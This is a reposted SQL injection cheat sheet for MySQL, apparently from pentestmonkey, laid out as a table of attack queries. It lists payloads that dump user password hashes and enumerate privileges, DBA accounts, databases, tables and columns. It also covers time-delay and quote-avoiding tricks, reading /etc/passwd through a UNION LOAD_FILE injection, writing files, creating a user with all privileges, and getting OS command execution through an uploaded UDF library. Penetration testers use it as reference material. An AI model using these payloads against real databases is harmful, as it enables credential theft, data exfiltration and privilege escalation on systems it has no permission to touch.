MySQL SQL Injection Cheat Sheet | |
Version | SELECT @@version |
Comments | SELECT 1;#comment |
Current User | SELECT user(); |
List Users | SELECT user FROM mysql.user; — priv |
List Password Hashes | SELECT host,user, password FROM mysql.user; — priv |
Password Cracker | Johnthe Ripper will crack MySQL password hashes. |
List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs |
SELECT host,user, Select_priv, Insert_priv, Update_priv, Delete_priv,Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; —priv, list user privs | |
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases(schemas) | |
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns | |
List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'; |
SELECT host,user FROM mysql.user WHERE Super_priv = 'Y'; # priv | |
Current Database | SELECT database() |
List Databases | SELECT schema_name FROM information_schema.schemata; — for MySQL >=v5.0 |
SELECT distinct(db) FROM mysql.db — priv | |
List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' ANDtable_schema != 'information_schema' |
List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; — find table which have a columncalled 'username' |
Select NthRow | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rowsnumbered from 0 |
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rowsnumbered from 0 | |
Select NthChar | SELECT substr('abcd', 3, 1); # returns c |
Bitwise AND | SELECT 6 &2; # returns 2 |
SELECT 6 &1; # returns 0 | |
ASCII Value-> Char | SELECT char(65); # returns A |
Char ->ASCII Value | SELECT ascii('A'); # returns 65 |
Casting | SELECT cast('1′ AS unsigned integer); |
SELECT cast('123′ AS char); | |
StringConcatenation | SELECT CONCAT('A','B'); #returns AB |
SELECT CONCAT('A','B','C'); # returns ABC | |
If Statement | SELECT if(1=1,'foo','bar'); — returns 'foo' |
Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A |
Avoiding Quotes | SELECT 0×414243; # returns ABC |
Time Delay | SELECT BENCHMARK(1000000,MD5('A')); |
SELECT SLEEP(5); # >= 5.0.12 | |
Make DNSRequests | Impossible? |
CommandExecution | If mysqld(<5.0) is running as root AND you compromise a DBA account youcan execute OS commands by uploading a shared object file into/usr/lib (or similar). The .so file should contain a User DefinedFunction (UDF). raptor_udf.cexplains exactly how you go about this. Remember to compile forthe target architecture which may or may not be the same as yourattack platform. |
Local File Access | …' UNION ALL SELECT LOAD_FILE('/etc/passwd') — priv, can only readworld-readable files. |
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; — priv, write to filesystem | |
Hostname,IP Address | SELECT @@hostname; |
Create Users | CREATE USER test1 IDENTIFIED BY 'pass1′; — priv |
Delete Users | DROP USER test1; — priv |
Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@'%'; — priv |
Location of DB files | SELECT @@datadir; |
Default/SystemDatabases | information_schema(>= mysql 5.0) |
原始链接:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet